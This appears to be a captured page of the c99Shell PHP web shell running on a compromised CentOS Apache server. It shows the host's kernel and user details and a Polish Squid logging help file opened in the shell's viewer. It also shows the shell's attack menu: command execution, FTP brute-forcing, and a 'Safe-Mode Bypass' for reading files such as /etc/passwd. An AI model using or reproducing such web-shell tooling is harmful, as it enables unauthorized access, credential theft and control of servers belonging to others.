!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/squid/help/   drwxr-xr-x
Free 53.68 GB of 127.8 GB (42%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_logs.pl.UTF-8.html (5.07 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Logowanie
Log dostępu: Domyślny zależy od systemu, zazwyczaj gdzieś w /var. Loguje aktywność zapytań klientów. Zawiera zapisy o każdym otrzymanym zapytaniu HTTP i ICP.

Log pracy proxy: Domyślny zależy od systemu. Plik logowania proxy. Jest to miejsce, do którego trafiają informacje o zachowaniu Twojego proxy. Możesz zwiększyć ilość logowanej w tym pliku informacji za pomocą Opcji śledzenia.

Log buforów: Domyślny zależy od systemu. Loguje aktywność zarządcy buforów cache. Pokazuje, które obiekty są wyrzucane z&buforów, a które są zachowywane i jak długo. Aby wyłączyć to logowanie, wisz "none". Naprawdę nie ma narzędzi do analizy tych danych, więc możesz to spokojnie wyłączyć.

Plik metadanych dla buforów: Domyślnie swap.log w każdym katalogu buforów. Ten log zawiera metadane obiektów zapisanych na dysku. Jest używany do przybudowywania buforów podczas startu. Plik ten znajduje się normalnie w każdym katalogu buforów, ale możesz podać tu inną ścieżkę. Zauważ, że musisz podać pełną nazwę pliku, a nie jedynie katalag. Jako że jest to plik indeksowy dla całej listy obiektów, NIE WOLNO Ci go okresowo czyścić!

Jeśli '%s' zostanie użyte w nazwie pliku, zostanie zastąpione przez nazwę pliku logu, w której każdy znak '/' zastąpiono przez '.'. Jest to potrzebne, aby umożliwić dodawanie/usuwanie linii z nazwami katalogów gdy kolejny log buforów cache jest w użyciu.

Jeśli masz więcej niż jeden katalog buforów a nie używasz '%s' w nazwie, wówczas poszczególne logi będą miały nazwy takie, jak:

  • cache_swap_log.00
  • cache_swap_log.01
  • cache_swap_log.02

Numery w końcówkach nazw (dodawane automatycznie) odpowiadają kolejności linii katalogów buforów cache w konfiguracji. Jeśli zmienisz podaną kolejność katalogów, wówczas te logi NIE będą odpowiadały prawidłowym wpisom z nazwami katalogów buforów (chyba, że zmienisz ich nazwy ręcznie). Zaleca się NIE używanie tej opcji. Lepiej trzymać pliki logów w odpowiednich katalogach buforów cache.

Używać formatu logów HTTPD: Domyślnie nie. Proxy może emulować format logów używany przez wiele programów 'httpd'. Aby emulację wyłączyć/włączyć ustaw tę wartość odpowiednio na Nie lub Tak. Domyślne jest używanie wewnętrznego formatu logów, ponieważ zawiera on użyteczne informacje wykorzystywane przez zorientowane na Squida analizatory logów.

Logować nagłówki MIME: Domyślnie nie. Proxy może zapisywać nagłówki MIME zarówno dla zapytań, jak i dla odpowiedzi dla każdej operacji HTTP. Nagłówki są bezpiecznie zakodowane i pojawiają się jako dwa ujęte w nawiasy pola na końcu wpisu do logu dostępu (zarówno dla wewnętrznego formatu Squida, jak i dla emulacji httpd). Aby włączyć to logowanie ustąw opcję na Tak.

Log programów użytkownika: Domyślnie brak. Jeśli podczas konfiguracji przed kompilacją włączono opcję "--enable-useragent-log", Squid będzie zapisywał pole "User-Agent" zapytań HTTP (zawierające zazwyczaj dane określające uzywaną przeglądarkę) do określonego tu pliku.

Plik z numerem PID: Domyślny zależy od systemu. Nazwa pliku, do którego jest zapisywany numer procesu (PID). Aby go nie używać wpisz "none".

Wykonywać identyfikację RFC931 dla ACL: Domyślnie dla żadnych. Wykonywanie zapytań identyfikacyjnych, aby określić nazwy użytkowników uzyskujących dostęp do czegokolwiek podpadającego pod te ACL.

Czas przeterminowania identyfikacji wg RFC931: Domyślnie 30 sekund. Maksymalny czas oczekiwania na wyniki zapytań IDENT. Jeśli jest zbyt duży i włączyłeś zapytania identa, możesz doprowadzić do zablokowania usługi (DoS) poprzez zbyt wiele jednocześnie wykonywanych zapytań ident.

Logować pełne nazwy hostów: Domyślnie nie. Logowanie pełnej (FQDN) nazwy hostów klientów.

Maska logowania: Domyślną jest 255.255.255.255. Maska dla adresów klientów w logach oraz wyniku cachemgr. Zmień ją, jeśli chcesz chonić prywatność swoich klientów. Przy masce 255.255.255.0 wszystkie IP będą logowane z ostatnią cyfrą ustawioną na '0'.

Opcje śledzenia: Domyślnie "ALL,1". Są to opcje logowania ustawiana jako "sekcja,poziom", gdzie każdy plik kodu źródłowego jest przypisany do unikalnej sekcji. Ustawienie niższego poziomu powoduje logowanie mniejszej ilości informacji, niż pełne śledzenie (poziom 9), przy którym może powstać bardzo duży log, więc bądź ostrożny. Magiczne słowo "ALL" ustawia poziomy śledzenia dla wszystkich sekcji. Zazwyczaj zaleca się uruchamianie z "ALL,1".

Tablica nagłówków MIME: Ścieżka do tablicy MIME Squida. Nie powinno być potrzeby zmiany tej opcji, ale standardowy plik zawiera przykłady i opis składni, gdyby takowa wystąpiła.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0137 ]--